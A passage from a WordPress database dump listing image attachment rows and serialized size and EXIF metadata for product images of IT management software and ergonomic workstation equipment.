arge\";a:4:{s:4:\"file\";s:49:\"Serv-U-File-Transfer-Protocol-Server-1024x640.png\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"Serv-U-File-Transfer-Protocol-Server-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"Serv-U-File-Transfer-Protocol-Server-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:48:\"Serv-U-File-Transfer-Protocol-Server-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"Serv-U-File-Transfer-Protocol-Server-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3037,2479,'_wp_attached_file','2018/12/Patch-Manager.png'),(3038,2479,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:713;s:6:\"height\";i:540;s:4:\"file\";s:25:\"2018/12/Patch-Manager.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Patch-Manager-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Patch-Manager-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Patch-Manager-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Patch-Manager-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Patch-Manager-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Patch-Manager-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3039,2480,'_wp_attached_file','2018/12/Serv-U-Managed-File-Transfer-Server.png'),(3040,2480,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:640;s:4:\"file\";s:47:\"2018/12/Serv-U-Managed-File-Transfer-Server.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"Serv-U-Managed-File-Transfer-Server-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"Serv-U-Managed-File-Transfer-Server-300x188.png\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"Serv-U-Managed-File-Transfer-Server-768x480.png\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"Serv-U-Managed-File-Transfer-Server-1024x640.png\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:47:\"Serv-U-Managed-File-Transfer-Server-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:47:\"Serv-U-Managed-File-Transfer-Server-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:47:\"Serv-U-Managed-File-Transfer-Server-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:45:\"Serv-U-Managed-File-Transfer-Server-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3041,2481,'_wp_attached_file','2018/12/Web-Help-Desk.png'),(3042,2481,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:405;s:4:\"file\";s:25:\"2018/12/Web-Help-Desk.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Web-Help-Desk-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Web-Help-Desk-300x188.png\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Web-Help-Desk-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Web-Help-Desk-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Web-Help-Desk-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Web-Help-Desk-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3043,2482,'_wp_attached_file','2018/12/Dameware-Remote-Support.png'),(3044,2482,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:405;s:4:\"file\";s:35:\"2018/12/Dameware-Remote-Support.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Dameware-Remote-Support-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Dameware-Remote-Support-300x188.png\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"Dameware-Remote-Support-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"Dameware-Remote-Support-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"Dameware-Remote-Support-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"Dameware-Remote-Support-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3045,2483,'_wp_attached_file','2018/12/Dameware-Mini-Remote-Control.png'),(3046,2483,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:405;s:4:\"file\";s:40:\"2018/12/Dameware-Mini-Remote-Control.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Dameware-Mini-Remote-Control-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Dameware-Mini-Remote-Control-300x188.png\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"Dameware-Mini-Remote-Control-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:40:\"Dameware-Mini-Remote-Control-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:40:\"Dameware-Mini-Remote-Control-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"Dameware-Mini-Remote-Control-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3047,2484,'_wp_attached_file','2018/12/Mobile-Admin.jpg'),(3048,2484,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:405;s:4:\"file\";s:24:\"2018/12/Mobile-Admin.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Mobile-Admin-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Mobile-Admin-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Mobile-Admin-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Mobile-Admin-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Mobile-Admin-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Mobile-Admin-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3049,2486,'_wp_attached_file','2018/12/WorkFit-Z-Mini.jpg'),(3050,2486,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2018/12/WorkFit-Z-Mini.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"WorkFit-Z-Mini-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"WorkFit-Z-Mini-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"WorkFit-Z-Mini-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"WorkFit-Z-Mini-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"WorkFit-Z-Mini-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"WorkFit-Z-Mini-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3051,2487,'_wp_attached_file','2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg'),(3052,2487,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:48:\"2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"WorkFit-TL-Standing-Desk-Workstation-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"WorkFit-TL-Standing-Desk-Workstation-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"WorkFit-TL-Standing-Desk-Workstation-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"WorkFit-TL-Standing-Desk-Workstation-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:48:\"WorkFit-TL-Standing-Desk-Workstation-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"WorkFit-TL-Standing-Desk-Workstation-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3053,2488,'_wp_attached_file','2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg'),(3054,2488,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:56:\"2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"WorkFit-S-Dual-Workstation-with-Worksurface--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"WorkFit-S-Dual-Workstation-with-Worksurface--300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:56:\"WorkFit-S-Dual-Workstation-with-Worksurface--300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:56:\"WorkFit-S-Dual-Workstation-with-Worksurface--480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:56:\"WorkFit-S-Dual-Workstation-with-Worksurface--500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:54:\"WorkFit-S-Dual-Workstation-with-Worksurface--20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3055,2489,'_wp_attached_file','2018/12/LX-Desk-Monitor-Arm-.jpg'),(3056,2489,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3000;s:6:\"height\";i:3000;s:4:\"file\";s:32:\"2018/12/LX-Desk-Monitor-Arm-.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"LX-Desk-Monitor-Arm--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"LX-Desk-Monitor-Arm--300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"LX-Desk-Monitor-Arm--768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"LX-Desk-Monitor-Arm--1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"LX-Desk-Monitor-Arm--300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"LX-Desk-Monitor-Arm--480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:32:\"LX-Desk-Monitor-Arm--640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"LX-Desk-Monitor-Arm--20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1259682495\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3057,2490,'_wp_attached_file','2018/12/LX-Dual-Stacking-Arm-.jpg'),(3058,2490,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:4:\"file\";s:33:\"2018/12/LX-Dual-Stacking-Arm-.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"LX-Dual-Stacking-Arm--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"LX-Dual-Stacking-Arm--300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"LX-Dual-Stacking-Arm--768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"LX-Dual-Stacking-Arm--300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"LX-Dual-Stacking-Arm--480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"LX-Dual-Stacking-Arm--640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"LX-Dual-Stacking-Arm--20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3059,2491,'_wp_attached_file','2018/12/LX-Wall-Monitor-Arm.jpg'),(3060,2491,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:815;s:4:\"file\";s:31:\"2018/12/LX-Wall-Monitor-Arm.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"LX-Wall-Monitor-Arm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"LX-Wall-Monitor-Arm-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"LX-Wall-Monitor-Arm-768x417.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:417;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"LX-Wall-Monitor-Arm-1024x556.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"LX-Wall-Monitor-Arm-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"LX-Wall-Monitor-Arm-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:31:\"LX-Wall-Monitor-Arm-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"LX-Wall-Monitor-Arm-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3061,2492,'_wp_attached_file','2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg'),(3062,2492,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:53:\"2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"WorkFit-C-Single-LD-Sit-Stand-Workstation-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"WorkFit-C-Single-LD-Sit-Stand-Workstation-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:53:\"WorkFit-C-Single-LD-Sit-Stand-Workstation-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:53:\"WorkFit-C-Single-LD-Sit-Stand-Workstation-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:53:\"WorkFit-